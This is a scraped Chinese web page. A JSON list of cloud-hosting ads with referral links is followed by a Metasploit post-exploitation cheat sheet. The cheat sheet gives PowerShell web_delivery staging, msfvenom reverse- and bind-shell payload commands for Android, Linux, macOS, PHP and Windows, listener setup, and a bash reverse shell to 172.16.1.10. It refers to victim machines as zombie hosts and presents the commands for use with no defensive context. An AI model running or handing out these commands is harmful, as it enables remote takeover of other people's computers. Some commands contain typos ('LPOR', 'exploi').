[{"createTime":1735734952000,"id":1,"img":"hwy_ms_500_252.jpeg","link":"https://activity.huaweicloud.com/cps.html?fromacct=261f35b6-af54-4511-a2ca-910fa15905d1&utm_source=V1g3MDY4NTY=&utm_medium=cps&utm_campaign=201905","name":"华为云秒杀","status":9,"txt":"华为云38元秒杀","type":1,"updateTime":1735747411000,"userId":3},{"createTime":1736173885000,"id":2,"img":"txy_480_300.png","link":"https://cloud.tencent.com/act/cps/redirect?redirect=1077&cps_key=edb15096bfff75effaaa8c8bb66138bd&from=console","name":"腾讯云秒杀","status":9,"txt":"腾讯云限量秒杀","type":1,"updateTime":1736173885000,"userId":3},{"createTime":1736177492000,"id":3,"img":"aly_251_140.png","link":"https://www.aliyun.com/minisite/goods?userCode=pwp8kmv3","memo":"","name":"阿里云","status":9,"txt":"阿里云2折起","type":1,"updateTime":1736177492000,"userId":3},{"createTime":1735660800000,"id":4,"img":"vultr_560_300.png","link":"https://www.vultr.com/?ref=9603742-8H","name":"Vultr","status":9,"txt":"Vultr送$100","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":5,"img":"jdy_663_320.jpg","link":"https://3.cn/2ay1-e5t","name":"京东云","status":9,"txt":"京东云特惠专区","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":6,"img":"new_ads.png","link":"https://www.iodraw.com/ads","name":"发布广告","status":9,"txt":"发布广告","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":7,"img":"yun_910_50.png","link":"https://activity.huaweicloud.com/discount_area_v5/index.html?fromacct=261f35b6-af54-4511-a2ca-910fa15905d1&utm_source=aXhpYW95YW5nOA===&utm_medium=cps&utm_campaign=201905","name":"底部","status":9,"txt":"高性能云服务器2折起","type":2,"updateTime":1735660800000,"userId":3}]
powershell上线
利用powershell上线msf
对应模块use exploit/multi/script/web_delivery
use exploit/multi/script/web_delivery set target 2 set payload
windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run
复制对应的powershell代码到Windows主机中执行便可以上线msf
msf木马上线
对应模块
use exploit/multi/handler
常见的木马生成
apk: msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o
test.apk Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip
LPOR=8888 -f elf>shell.elf Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST=ip
LPOR=8888 -f macho>shell.macho PHP: msfvenom -p php/meterpreter/reverse_tcp
LHOST=ip LPOR=8888 -o xx.php exe: msfvenom -p windows/meterpreter/reverse_tcp
lhost=192.168.10.27 lport=8888 -f exe -o test.exe
反向马
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.10 lport=6666 -f
exe -o test.exe
正向马
msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=80 -o shell.exe
msf开启监听,肉鸡执行木马上线
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp
反向payload set payload windows/x64/meterpreter/bind_tcp 正向payload set lhost
172.16.1.10 set lport 6666 exploi
Linux bash上线
对应模块
use exploit/multi/handler
use exploit/multi/handler set payload cmd/unix/reverse_bash set lport 7777 set
lhost 172.16.1.10 run
肉鸡执行bash上线
bash -i >& /dev/tcp/172.16.1.10/7777 0>&1